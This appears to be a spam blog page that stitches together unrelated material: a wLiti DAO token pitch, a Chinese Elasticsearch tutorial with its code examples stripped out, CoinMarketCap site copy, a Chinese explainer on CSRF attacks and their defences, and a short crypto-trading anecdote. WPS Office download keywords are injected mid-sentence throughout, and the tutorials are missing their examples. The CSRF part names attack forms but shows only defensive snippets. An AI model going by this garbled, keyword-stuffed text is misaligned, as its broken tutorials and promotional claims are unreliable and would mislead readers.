博客

  • wps电脑版下载的地方

      ”wLiti DAO (WLD)’s smart contract was deployed on Febwps官网最新的下载的网站是什么(wps office免费版能打印吗). 7th, 2022 and was listed on its first exchange (Quickswap) on Feb. 10th, 2022. It was created by a group of wLITI token holders who chose to use wLITI as the foundation for the WLD token. When a person deposits wLITI tokens into the DAO smart contract, WLD tokens are minted at a 1 to 1 ratio with the wLITI being depositedwps官网下载网址在哪(wps官网在哪打开). wLITI tokens can be withdrawn from the DAO smart contract at any time, except for when the wLITI is converted into LITI tokens to represent all of the wLiti DAO members (a wLiti DAO wps的的官网下载地方(wps下载电脑版流程官网) member is anyone who owns WLD). When wLITI tokens are withdrawn from the DAO, the WLD tokens that are being swapped for the wLITI are burned at a 1 to 1 ration with the amount of wLITI being withdrawn.

      wLiti DAO will continuously evolve overtime to serve the best interests of the wLiti DAO members. The wLiti DAO’s governance smart contract will not be able to execute any transactions unless the wLiti DAO members approve the transaction through the use of proposals and votingwps免费版的下载网站. Proposals are proposed transactions that the wLiti DAO’s governance smart contract can execute. The transaction proposals can be created by any wLiti wps office 的官方的下载的地方是多少 DAO member. The transaction proposals must have a majority vote from the DAO members to be before they can be approved and will not be executed by the wLiti DAO’s governance smart contract if it does not have a majority vote from the wLiti DAO members.

      In addition to wLITI being the foundational asset of wLiti DAO, the DAO owns more assets and offers additional services that will ultimately generate more revenue for wLiti DAO. This revenue will go to the DAO’s treasury to fund the DAO’s endeavors and / or be distributed to the wLiti DAO memberswps的官网的下载地址的方法. One of the assets that the DAO has acquired is 1% of a large investment default case that has a $1 billion claimwps的的官网下载网址怎么找(wps官网首页电脑版). When awarded, a portion of this will be used to fund the DAO’s treasury and the rest will be distributed prorata to the wLiti DAO members. wLiti DAO is working with other organizations, such as Athena Intelligence, to offer operational due diligence, scam prevention and insurance services to startup projects, vetting wps的官网最新下载地址在哪里 the company principals and offering ongoing scam / fraud monitoring protection and insurance. wLiti DAO’s treasury, owned and managed by the wLiti DAO members through the use of the wLiti DAO’s governance smart contract, will receive a one-time fee plus a small transaction tax to pay for future legal and investigative work. A portion of this revenue will be distributed prorata to the all of the wLiti DAO members. wLiti DAO members will also be able to take educational courses that are created by wLiti DAO, plus have the opportunity to earn bounties for field work, analysis, and penetration testing.”

  • WPS office的电脑版下载的方法怎么找

      kibana安装成功后

      需要在 config -> kibana.yml 文件中修改Elasticsearch的地址。

      在这里插入图片描述

      在这里插入图片描述

      为索引库名。

      请求方式为请求,参数为数据(指含有3个分片和2个副本)。

      发送请求方式为。

      在这里插入图片描述发送请求后创建成功,如下图所示:

      在这里插入图片描述由于上方的数据参数比较难写,所以借助 工具(因为 工具中有提示)。

      访问路径:

      在这里插入图片描述在这里插入图片描述在这里插入图片描述相当于是省去了 的服务器地址

      而且还有语法提示,非常舒服。

      语法

      Get请求可以帮我们查看索引信息,格式:

      在这里插入图片描述或者,我们可以使用*来查询所有索引库配置:

      在这里插入图片描述

      删除索引使用DELETE请求

      语法

      示例

      在这里插入图片描述

      再次查看 test00:

      在这里插入图片描述

      当然,我们也可以用HEAD请求,查看索引是否存在:

      在这里插入图片描述

      索引有了,接下来肯定是添加数据。但是,在添加数据之前必须定义映射。

      映射是定义文档的过程,文档包含哪些字段,这些字段是否保存,是否索引,是否分词等

      只有配置清楚,Elasticsearch才会帮我们进行索引库的创建(不一定)

      语法

      请求方式依然是PUT

      类型名称:就是前面将的type的概念,类似于数据库中的不同表

      字段名:任意填写 ,可以指定许多属性,例如:type:类型,可以是text、long、short、date、integer、object等index:是否索引,默认为truestore:是否存储,默认为falseanalyzer:分词器,这里的即使用ik分词器

      示例

      发起请求:

      响应结果:

      语法:

      示例:

      响应:

      5.3.1. type

      Elasticsearch中支持的数据类型非常丰富:

      String类型,又分两种:

      text:可分词,不可参与聚合keyword:不可分词,数据会作为完整字段进行匹配,可以参与聚合

      Numerical:数值类型,分两类

      7大基本数据类型:byte、short、interger、long、float、double、half_float浮点数的高精度类型:scaled_float

      需要指定一个精度因子,比如10或100。elasticsearch会把真实值乘以这个因子后存储,取出时再还原。

      Date:日期类型

      elasticsearch可以对日期格式化为字符串存储,但是建议我们存储为毫秒值,存储为long,节省空间。

      5.3.2. index

      index影响字段的索引情况。

      true:字段会被索引,则可以用来进行搜索。默认值就是truefalse:字段不会被索引,不能用来搜索

      index的默认值就是true,也就是说你不进行任何配置,所有字段都会被索引。

      但是有些字段是我们不希望被索引的,比如商品的图片信息,就需要手动设置index为false。

      5.3.3. store

      是否将数据进行额外存储。

      在学习 和 时,我们知道如果一个字段的 设置为 ,那么在文档列表中就不会有这个字段的值,用户的搜索结果中不会显示出来。

      但是在Elasticsearch中,即便store设置为false,也可以搜索到结果。

      原因是Elasticsearch在创建文档索引时,会将文档中的原始数据备份,保存到一个叫做的属性中。而且我们可以通过过滤来选择哪些要显示,哪些不显示。

      而如果设置store为true,就会在以外额外存储一份数据,多余,因此一般我们都会将store设置为false,事实上,store的默认值就是false。

      通过POST请求,可以向一个已经存在的索引库中添加数据。

      语法:

      示例:

      响应:

      通过 查看数据:

      :源文档信息,所有的数据都在里面。:这条文档的唯一标示,与文档自己的id字段没有关联

      如果我们想要自己新增的时候指定id,可以这么做:

      示例:

      得到的数据:

      Elasticsearch非常智能,不需要给索引库设置任何mapping映射,它也可以根据你输入的数据来判断类型,动态添加数据映射。

      测试一下:

      我们额外添加了stock库存,和saleable是否上架两个字段。

      来看结果:

      在看下索引库的映射关系:

      stock和saleable都被成功映射了。

      把刚才新增的请求方式改为PUT,就是修改了。不过修改必须指定id,

      id对应文档存在,则修改id对应文档不存在,则新增

      比如,我们把id为3的数据进行修改:

      结果:

      删除使用DELETE请求,同样,需要根据id进行删除:

      语法

      示例:

      wps的的官网最新下载地方在这里插入图片描述

      基本查询过滤结果过滤高级查询排序

      基本语法

      这里的query代表一个查询对象,里面可以有不同的查询属性

      查询类型:

      例如:, , , 等等 查询条件:查询条件会根据类型的不同,写法也有差异,后面详细讲解

      在这里插入图片描述

      9.1.1 查询所有(match_all)

      示例:

      :代表查询对象:代表查询所有

      结果:

      took:查询花费时间,单位是毫秒time_out:是否超时_shards:分片信息hits:搜索结果总览对象

      total:搜索到的总条数max_score:所有结果中文档得分的最高分hits:搜索结果的文档对象数组,每个元素是一条搜索到的文档信息

      _index:索引库_type:文档类型_id:文档id_score:文档得分_source:文档的源数据

      9.1.2 匹配查询(match)

      我们先加入一条数据,便于测试:

      现在,索引库中有1部手机,1台电视:

      在这里插入图片描述

      or关系

      类型查询,会把查询条件进行分词,然后进行查询,多个词条之间是or的关系

      结果:

      在上面的案例中,不仅会查询到电视,而且与小米相关的都会查询到,多个词之间是的关系。

      and关系

      某些情况下,我们需要更精确查找,我们希望这个关系变成,可以这样做:

      结果:

      本例中,只有同时包含和的词条才会被搜索到。

      or和and之间?

      在 与 间二选一有点过于非黑即白。 如果用户给定的条件分词后有 5 个查询词项,想查找只包含其中 4 个词的文档,该如何处理?将 operator 操作符参数设置成 只会将此文档排除。

      有时候这正是我们期望的,但在全文搜索的大多数应用场景下,我们既想包含那些可能相关的文档,同时又排除那些不太相关的。换句话说,我们想要处于中间某种结果。

      查询支持 最小匹配参数, 这让我们可以指定必须匹配的词项数用来表示一个文档是否相关。我们可以将其设置为某个具体数字,更常用的做法是将其设置为一个,因为我们无法控制用户搜索时输入的单词数量:

      本例中,搜索语句可以分为3个词,如果使用and关系,需要同时满足3个词才会被搜索到。这里我们采用最小品牌数:75%,那么也就是说只要匹配到总词条数量的75%即可,这里3*75% 约等于2。所以只要包含2个词条就算满足条件了。

      9.1.3 多字段查询(multi_match)

      与类似,不同的是它可以在多个字段中查询

      本例中,我们会在title字段和subtitle字段中查询这个词

      9.1.4 词条匹配(term)

      查询被用于 精确值匹配,这些精确值可能是数字、时间、布尔或者那些 未分词 的字符串

      结果:

      9.1.5 多词条精确匹配(terms)

      查询和 term 查询一样,但它允许你指定多值进行匹配。如果这个字段包含了指定值中的任何一个值,那么这个文档满足条件:

      结果:

      默认情况下,elasticsearch在搜索的结果中,会把文档中保存在的所有字段都返回。

      如果我们只想获取其中的部分字段,我们可以添加的过滤

      9.2.1.直接指定字段

      示例:

      返回的结果:

      9.2.2.指定 includes 和 excludes

      我们也可以通过:

      includes:来指定想要显示的字段excludes:来指定不想要显示的字段

      二者都是可选的。

      示例:

      与下面的结果将是一样的:

      9.3.1 布尔组合(bool)

      把各种其它查询通过(与)、(非)、(或)的方式进行组合

      结果:

      9.3.2 范围查询(range)

      查询找出那些落在指定区间内的数字或者时间

      查询允许以下字符:

      操作符说明gt大于gte大于等于lt小于lte小于等于

      9.3.3 模糊查询(fuzzy)
    wps的官网最新的下载的方法在哪里
      我们新增一个商品:

      查询是 查询的模糊等价。它允许用户搜索词条与实际词条的拼写出现偏差,但是偏差的编辑距离不得超过2:

      上面的查询,也能查询到apple手机

      我们可以通过来指定允许的编辑距离:

      条件查询中进行过滤

      所有的查询都会影响到文档的评分及排名。如果需要在查询结果中进行过滤,并且不希望过滤条件影响评分,那么就不要把过滤条件作为查询条件来用。而是使用方式:

      注意:中还可以再次进行组合条件过滤。

      无查询条件,直接过滤

      如果一次查询只有过滤,没有查询条件,不希望进行评分,我们可以使用取代只有 filter 语句的 bool 查询。在性能上是完全相同的,但对于提高查询简洁性和清晰度有很大帮助。

      9.5.1 单字段排序

      可以让我们按照不同的字段进行排序,并且通过指定排序的方式

      9.5.2 多字段排序

      假定要结合使用 和 (得分) 进行查询,并且匹配的结果首先按照价格排序,然后按照相关性得分排序:

      聚合可以极其方便的实现对数据的统计、分析。

      例如:

      什么品牌的手机最受欢迎?这些手机的平均价格、最高价格、最低价格?这些手机每月的销售情况如何?

      实现这些统计功能的比数据库的sql要方便的多,而且查询速度非常快,可以实现实时搜索效果。

      Elasticsearch中的聚合,包含多种类型,最常用的两种,一个叫,一个叫:

      桶(bucket)

      桶的作用,是按照某种方式对数据进行分组,每一组数据在ES中称为一个,例如我们根据国籍对人划分,可以得到、,……或者我们按照年龄段对人进行划分:0~10 , 10~20 , 20~30, 30~40等。

      Elasticsearch中提供的划分桶的方式有很多:

      Date Histogram Aggregation:根据日期阶梯分组,例如给定阶梯为周,会自动每周分为一组Histogram Aggregation:根据数值阶梯分组,与日期类似Terms Aggregation:根据词条内容分组,词条内容完全匹配的为一组Range Aggregation:数值和日期的范围分组,指定开始和结束,然后按段分组……

      bucket aggregations 只负责对数据进行分组,并不进行计算,因此往往bucket中往往会嵌套另一种聚合:metrics aggregations即度量

      度量(metrics)

      分组完成以后,我们一般会对组中的数据进行聚合运算,例如求平均值、最大、最小、求和等,这些在ES中称为

      比较常用的一些度量聚合方式:

      Avg Aggregation:求平均值Max Aggregation:求最大值Min Aggregation:求最小值Percentiles Aggregation:求百分比Stats Aggregation:同时返回avgwps office的免费版下载网址怎么找(wps官网下载视频插件)、max、min、sum、count等Sum Aggregation:求和Top hits Aggregation:求前几Value Count Aggregation:求总数……

      为了测试聚合,我们先批量导入一些数据

      创建索引:

      注意:在ES中,需要进行的字段其处理方式比较特殊,因此不能被分词。这里我们将color和make这两个文字类型的字段设置为keyword类型,这个类型不会被分词,将来就可以参与聚合

      导入数据

      首先,我们按照 汽车的颜色 来划分

      size: 查询条数,这里设置为0,因为我们不关心搜索到的数据,只关心聚合结果,提高效率aggs:声明这是一个聚合查询,是aggregations的缩写

      popular_colors:给这次聚合起一个名字,任意。

      terms:划分桶的方式,这里是根据词条划分

      field:划分桶的字段

      结果:

      hits:查询结果为空,因为我们设置了size为0aggregations:聚合的结果popular_colors:我们定义的聚合名称buckets:查找到的桶,每个不同的color字段值都会形成一个桶

      key:这个桶对应的color字段的值doc_count:这个桶中的文档数量

      通过聚合的结果我们发现,目前红色的小车比较畅销!

      前面的例子告诉我们每个桶里面的文档数量,这很有用。 但通常,我们的应用需要提供更复杂的文档度量wps的电脑版的下载的地址是多少。 例如,每种颜色汽车的平均价格是多少?

      因此,我们需要告诉Elasticsearch,进行运算,这些信息要嵌套在内,的运算会基于内的文档进行

      现在,我们为刚刚的聚合结果添加 求价格平均值的度量:

      aggs:我们在上一个aggs(popular_colors)中添加新的aggs。可见也是一个聚合avg_price:聚合的名称avg:度量的类型,这里是求平均值field:度量运算的字段

      结果:

      可以看到每个桶中都有自己的字段,这是度量聚合的结果

      刚刚的案例中,我们在桶内嵌套度量运算。事实上桶不仅可以嵌套运算, 还可以再嵌套其它桶wps的的官网最新的下载的网站怎么找(wps官网最新在哪)。也就是说在每个分组中,再分更多组。

      比如:统计每种颜色的汽车中,分别属于哪个制造商,按照字段再进行分桶

      原来的color桶和avg计算我们不变maker:在嵌套的aggs下新添一个桶,叫做makerterms:桶的划分类型依然是词条filed:这里根据make字段进行划分

      部分结果:

      我们可以看到,新的聚合被嵌套在原来每一个的桶中。每个颜色下面都根据 字段进行了分组我们能读取到的信息:

      红色车共有4辆红色车的平均售价是 $32,500 美元。其中3辆是 Honda 本田制造,1辆是 BMW 宝马制造。

      前面讲了,划分桶的方式有很多,例如:
    WPS office的电脑版的下载的地址在哪里
      Date Histogram Aggregation:根据日期阶梯分组,例如给定阶梯为周,会自动每周分为一组Histogram Aggregation:根据数值阶梯分组,与日期类似Terms Aggregation:根据词条内容分组,词条内容完全匹配的为一组Range Aggregation:数值和日期的范围分组,指定开始和结束,然后按段分组

      刚刚的案例中,我们采用的是Terms Aggregation,即根据词条划分桶。

      接下来,我们再学习几个比较实用的:

      10.5.1.阶梯分桶Histogram(“histogram”: { “field”: “price”, “interval”: 5000 })

      原理:

      histogram是把数值类型的字段,按照一定的阶梯大小进行分组。你需要指定一个阶梯值(interval)来划分阶梯大小。

      举例:

      比如你有价格字段,如果你设定 的值为200,那么阶梯就会是这样的:

      0,200,400,600,…

      上面列出的是每个阶梯的key,也是区间的启点。

      如果一件商品的价格是 450 ,会落入哪个阶梯区间呢?计算公式如下:

      :就是当前数据的值,本例中是450

      :起始偏移量,默认为0

      :阶梯间隔,比如200

      因此你得到的:key = Math.floor((450 – 0) / 200) * 200 + 0 = 400

      操作一下:

      比如,我们对汽车的价格进行分组,指定间隔 为 5000:

      结果:

      你会发现,中间有大量的文档数量为0 的桶,看起来很丑。

      我们可以增加一个参数 为1,来约束最少文档数量为1,这样文档数量为0的桶会被过滤

      示例:

      结果:

      完美,!

      如果你用kibana将结果变为柱形图,会更好看:

      [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ts4jThSy-1583400408766)(assets/1531752558505.png)]

      10.5.2.范围分桶range

      范围分桶与阶梯分桶类似,也是把数字按照阶段进行分组,只不过range方式需要你自己指定每一组的起始和结束大小。

  • wps office 的官方的下载地方在哪里

      Welcome to CoinMarketCap.com! This site was founded in May 2013 by Brandon Chez to provide up-to-date cryptocurrency prices, charts and data about the emerging cryptocurrency markets. Since then, the world of blockchain and cryptocurrency has grown exponentially and we are very proud to have grown with it. We take our data very seriously and we do not change our data to fit any narrative: we stand for accurately, timely and unbiased information.

      Here at CoinMarketCap, we work very hard to ensure that all the relevant and up-to-date information about cryptocurrencies, coins and tokens can be located in one easily discoverable place. From the very first day, the goal was for the site to be the number one location online for crypto market data, and we work hard to empower our users with our unbiased and accurate information.

      Each of our coin data pages has a graph that shows both the current and historic price information for the coin or tokenwps的电脑版下载地方是多少(wps下载电脑版官网最新). Normally, the graph starts at the launch of the asset, but it is possible to select specific to and from dates to customize the chart to your own needs. These charts and their information are free to visitors of our website.

      The most experienced and professional traders often choose to use the best crypto API on the market. Our API enables millions of calls to track current prices and to also investigate historic prices and is used by some of the largest crypto exchanges and financial institutions in the world.

      CoinMarketCap wps的的官网下载网站在哪 also provides data about the most successful traders for you to monitor. We also provide data about the latest trending cryptos and trending DEX pairs.

      We receive updated cryptocurrency prices directly from many exchanges based on their pairs. We then convert the number to USD. A full explanation can be found here.

      Related Links

      Are you ready to learn more? Visit our glossary and crypto learning center.

      Are you interested in the scope of crypto assets? Investigate our list of cryptocurrency categories.

      Are you interested in knowing which the hottest dex pairs are currently?

      We calculate our valuations based on the total circulating supply of an asset multiplied by the currency reference price. The topic is explained in more detail here.

      We calculate the total cryptocurrency market capitalization as the sum of all cryptocurrencies listed on the site.

      Almost. We have a process that we use to verify assets. Once verified, we create a coin description page like this. The world of crypto now contains many coins and tokens that we feel unable to verify. In those situations, our Dexscan product lists them automatically by taking on-chain data for newly created smart contracts. We do not cover every chain, but at the time of writing we track the top 70 crypto chains, which means that we list more than 97% of all tokens.

      At the time of writing, we estimate that there are more than 2 million pairs being traded, made up of coins, tokens and projects in the global coin market. As mentioned above, we have a due diligence process that we apply to new coins before they are listed. This process controls how many of the cryptocurrencies from the global market are represented on our site.

      The very first cryptocurrency was Bitcoin. Since it is open source, it is possible for other people to use the majority of the code, make a few changes and then launch their own separate currency. Many people have done exactly this. Some of these coins are very similar to Bitcoin, with just one or two amended features (such as Litecoin), while others are very different, with varying models of security, issuance and governance. However, they all share the same moniker — every coin issued after Bitcoin is considered to be an altcoin.

      The first chain to launch smart contracts was Ethereum. A smart contract enables multiple scripts to engage with each other using clearly defined rules, to execute on tasks which can become a coded form of a contract. They have revolutionized the digital asset space because they have enabled decentralized exchanges, decentralized finance, ICOs, IDOs and much more. A huge proportion of the value created and stored in cryptocurrency is enabled by smart contracts.WPS office的官网最新的下载网站在哪里

      Price volatility has long been one of the features of the cryptocurrency market. When asset prices move quickly in either direction and the market itself is relatively thin, it can sometimes be difficult to conduct transactions as might be needed. To overcome this problem, a new type of cryptocurrency tied in value to existing currencies — ranging from the U.S. dollar, other fiats or even other cryptocurrencies — arose. These new cryptocurrency are known as stablecoins, and they can be used for a multitude of purposes due to their wps office的免费版下载的地址在哪(wps官网最新下载电脑版下载) stability.

      NFTs are multi-use images that are stored on a blockchain. They can be used as art, a way to share QR codes, ticketing and many more things. The first breakout use was for art, with projects like CryptoPunks and Bored Ape Yacht Club gaining large followings. We also list all of the top NFT collections available, including the related NFT coins and tokens.. We collect latest sale and transaction data, plus upcoming NFT collection launches onchain. NFTs are a new and innovative part of the crypto ecosystem that have the potential to change and update many business models for the Web 3 world.

      Play-to-earn (P2E) games, also known as GameFi, has emerged as an extremely popular category in the crypto space. It combines non-fungible tokens (NFT), in-game crypto tokens, decentralized finance (DeFi) elements and sometimes even metaverse applications. Players have an opportunity to generate revenue by giving their time (and sometimes capital) and playing these games.

      One of the biggest winners is Axie Infinity — a Pokémon-inspired game where players collect Axies (NFTs of digital pets), breed and battle them against other players to earn Smooth Love Potion (SLP) — the in-game reward token. This game was extremely popular in developing countries like The Philippines, due to the level of income they could earn. Players in the Philippines can check the price of SLP to PHP today directly on CoinMarketCap. What Are ETFs?

      In January 2024 the SEC approved 11 exchange traded funds to invest in Bitcoin. There were already a number of Bitcoin ETFs available in other countries, but this change allowed them to be available to retail investors in the United States. This opens the way for a much wider range of investors to be able to add some exposure to cryptocurrency in their portfolios.

      CoinMarketCap does not offer financial or investment advice about which cryptocurrency, token or asset does or does not make a good investment, nor do we offer advice about the timing of purchases or salesWPS office的官网最新下载的地方的方法. We are strictly a data company.

      Please remember that the prices, yields and values of financial assets change. This means that any capital you may invest is at risk. We recommend seeking the advice of a professional investment advisor for guidance related to your personal circumstances.wps office 的官方下载的网站在哪

      TThe data at CoinMarketCap updates every few seconds, which means that it is possible to check in on the value of your investments and assets at any time and from anywhere in the world. We look forward to seeing you regularly!

  • wps的官网最新的下载的网址的方法

      (Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和,所以被认为比XSS。

      你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,WPS office的电脑版的下载网站怎么找转账……造成的问题包括:个人隐私泄露以及财产安全。

      通过下图来简述原理

      

      从上图可以看出,要完成一次CSRF攻击,受害者必须依次完成两个步骤:
    wps office免费版下载的入口在哪里
      登录受信任网站A,并在本地生成Cookie。在不登出A的情况下,访问危险网站B。
    WPS office的官网下载的地方的方法
      看到这里,你也许会说:“如果我不满足以上两个条件中的一个,我就不会受到CSRF的攻击”。是的,确实如此,但你不能保证以下情况不会发生:

      1.你不能保证你登录了一个网站后,不再打开一个tab页面并访问另外的网站。

      2.你不能保证你关闭浏览器了后,你本地的Cookie立刻过期,你上次的会话已经结束。(事实上,关闭浏览器不能结束一个会话,但大多数人都会错误的认为关闭浏览器就等于退出登录/结束会话了……)

      3.上图中所谓的攻击网站,可能是一个存在其他漏洞的可信任的经常被人访问的网站。

      详细的原理介绍

      GET类型的CSRF

      这种类型的CSRF一般是由于程序员安全意识不强造成的。GET类型的CSRF利用非常简单,只需要一个HTTP请求,所以,一般会这样利用:

      在访问含有这个img的页面后,成功向 发出了一次HTTP请求。所以,如果将该网址替换为存在GET型CSRF的地址,就能完成攻击了。

      乌云案例

      POST类型的CSRF

      这种类型的CSRF危害没有GET型的大,利用起来通常使用的是一个自动提交的表单,如:

      访问该页面后,表单会自动提交,相当于模拟用户完成了一次POST操作。

      乌云案例

      其他猥琐流CSRF

      过基础认证的CSRF(常用于路由器):

      POC:

      加载该图片后,路由器会给用户一个合法的SESSION,就可以进行下一步操作了。

      乌云案例

      1、将cookie设置为HttpOnly

      CRSF攻击很大程度上是利用了浏览器的cookie,为了防止站内的XSS漏洞盗取cookie,需要在cookie中设置"HttpOnly"属性,这样通过程序(js、applet等)无法读取到cookie信息。避免了攻击者伪造cookie的情况出现。

      服务端的CSRF方式方法很多样,但总的思想都是一致的,就是在客户端页面增加伪随机数。

      2、Cookie WPS office的电脑版下载的方法 Hashing(所有表单都包含同一个伪随机值)

      这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败了

      示例:为表单增加一个隐藏域,其值是cookie+“abc”的算法,后台用相同的算法对比来判断请求者是否合法。

      csrf1.jsp

      后台的controller:

      显示结果:csrf2.jsp

      3、验证码

      这个方案的思路是:每次的用户提交都需要用户在表单中填写一个图片上的随机字符串,厄….这个方案可以完全解决CSRF,但个人觉得在易用性方面似乎不是太好,还有听闻是验证码图片的使用涉及了一个被称为MHTML的Bug,可能在某些版本的微软IE中受影响。

      在业界目前防御 CSRF 攻击主要有三种策略:验证 HTTP Referer 字段;在请求地址中添加 token 并验证;在 HTTP 头中自定义属性并验证。下面就分别对这三种wps官网最新的下载的网址是什么策略进行详细介绍。

      4、验证 HTTP Referer 字段

      根据 HTTP 协议,在 HTTP 头中有一个字段叫 Referer,它记录了该 HTTP 请求的来源地址。在通常情况下,访问一个安全受限页面的请求来自于同一个网站,比如需要访问 ,用户必须先登陆 bank.example,然后通过点击页面上的按钮来触发转账事件。因此,要防御 CSRF 攻击,网站只需要对于每一个转账请求验证其 Referer 值,如果是以 bank.example 开头的域名,则说明该请求是来自银行网站自己的请求,是合法的。如果 Referer 是其他网站的话,则有可能是黑客的 CSRF 攻击,拒绝该请求。

      这种方法的显而易见的好处就是简单易行,网站的普通开发人员不需要操心 CSRF 的漏洞,只需要在最后给所有安全敏感的请求统一增加一个拦截器来检查 Referer 的值就可以。

      然而,这种方法并非万无一失。Referer 的值是由浏览器提供的,虽然 HTTP 协议上有明确的要求,但是每个浏览器对于 Referer 的具体实现可能有差别,并不能保证浏览器自身没有安全漏洞。使用验证 Referer 值的方法,就是把安全性都依赖于第三方(即浏览器)来保障,从理论上来讲,这样并不安全。事实上,对于某些浏览器,比如,目前已经有一些方法可以篡改 Referer 值。如果 网站支持,黑客完全可以把用户浏览器的 Referer 值设为以 bank.example 域名开头的地址,这样就可以通过验证,从而进行 CSRF 攻击。

      即便是使用最新的浏览器,黑客无法篡改 Referer 值,这种方法仍然有问题。因为 Referer 值会记录下用户的访问来源,有些用户认为这样会侵犯到他们自己的隐私权,特别是有些组织担心 Referer 值会把组织内网中的某些信息泄露到外网中。因此,用户自己可以设置浏览器使其在发送请求时不再提供 Referer。当他们正常访问银行网站时,网站会因为请求没有 Referer 值而认为是 CSRF 攻击,拒绝合法用户的访问。

      5、在请求地址中添加 token 并验证

      CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,该请求中所有的用户验证信息都是存在于 cookie 中,因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。要抵御 CSRF,关键在于在请求中放入黑客所不能伪造的信息,并且该信息不存在于 cookie 之中。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。

      这种方法要比检查 Referer 要安全一些,token 可以在用户登陆后产生并放于 session 之中,然后在每次请求时把 token 从 session 中拿出,与请求中的 token 进行比对,但这种方法的难点在于如何把 token 以参数的形式加入请求。对于 GET 请求,token 将附在请求地址之后,这样 URL 就变成 http://url?csrftoken=tokenvalue。 而对于 POST 请求来说,要在 form 的最后加上 <input type=”hidden” name=”csrftoken” value=”tokenvalue”/>,这样就把 token 以参数的形式加入请求了。但是,在一个网站中,可以接受请求的地方非常多,要对于每一个请求都加上 token 是很麻烦的,并且很容易漏掉,通常使用的方法就是在每次页面加载时,使用 javascript 遍历整个 dom 树,对于 dom 中所有的 a 和 form 标签后加入 token。这样可以解决大部分的请求,但是对于在页面加载之后动态生成的 html 代码,这种方法就没有作用,还需要程序员在编码时手动添加 token。

      该方法还有一个缺点是难以保证 token 本身的安全。特别是在一些论坛之类支持用户自己发表内容的网站,黑客可以在上面发布自己个人网站的地址。由于系统也会在这个地址后面加上 token,黑客可以在自己的网站上得到这个 token,并马上就可以发动 CSRF 攻击。为了避免这一点,系统可以在添加 token 的时候增加一个判断,如果这个链接是链到自己本站的,就在后面添加 token,如果是通向外网则不加。不过,即使这个 csrftoken 不以参数的形式附加在请求之中,黑客的网站也同样可以通过 Referer 来得到这个 token 值以发动 CSRF 攻击。这也是一些用户喜欢手动关闭浏览器 Referer 功能的原因。

      6、在 HTTP 头中自定义属性并验证

      这种方法也是使用 token 并进行验证,和上一种方法不同的是,这里并不是把 token 以参数的形式置于 HTTP 请求之中,而是把它放到 HTTP 头中自定义的属性里。通过 XMLHttpRequest 这个类,可以一次性给所有该类请求加上 csrftoken 这个 HTTP 头属性,并把 token 值放入其中。这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。

      然而这种方法的局限性非常大。XMLHttpRequest 请求通常用于 Ajax 方法中对于页面局部的异步刷新,并非所有的请求都适合用这个类来发起,而且通过该类请求得到的页面不能被浏览器所记录下,从而进行前进,后退,刷新,收藏等操作,给用户带来不便。另外,对于没有进行 CSRF 防护的遗留系统来说,要采用这种方法来进行防护,要把所有请求都改为 XMLHttpRequest 请求,这样几乎是要重写整个网站,这代价无疑是不能接受的。
    wps 的官网最新的下载的地址是多少(wps官网最新客服电话是多少)
      取得HTTP请求Referer:

      String referer = request.getHeader("Referer");

      Sailajs框架中的JavaScript 代码示例

      下面将以 JavaScript 为例,对上述三种方法分别用代码进行示例。

      1.验证 Referer

      2.验证请求中的 token

      3、HTTP 头中自定义属性(网上例子)

      CSRF 是一种危害非常大的攻击,又很难以防范。目前几种防御策略虽然可以很大程度上抵御 CSRF 的攻击,但并没有一种完美的解决方案。一些新的方案正在研究之中,比如对于每次请求都使用不同的动态口令,把 Referer 和 token 方案结合起来,甚至尝试修改 HTTP 规范,但是这些新的方案尚不成熟,要正式投入使用并被业界广为接受还需时日。在这之前,我们只有充分重视 CSRF,根据系统的实际情况选择最合适的策略,这样才能把 CSRF 的危害降到最低

  • wps的的官网最新下载网址是多少(wps office下载手机版免费下载)

      作为常年接触币圈案件的律师,潜移默化的成了币圈玩家,年初的市场动荡,ETH大跌,拿着手上的U,本想加仓ETH,但看着社群里面的带单信息,突然想着要不借着行情玩一次合约?好在,问了身边的几个玩家,都说“不要玩合约,就是赌博”、“不要玩合约,你会睡不着的”。最终,看着群里带单员发的信息,想起自己接触的带单返佣被认定开设赌场的案件,知道自己不该去“赌”wps官网最新的下载地方是多少。图片图片

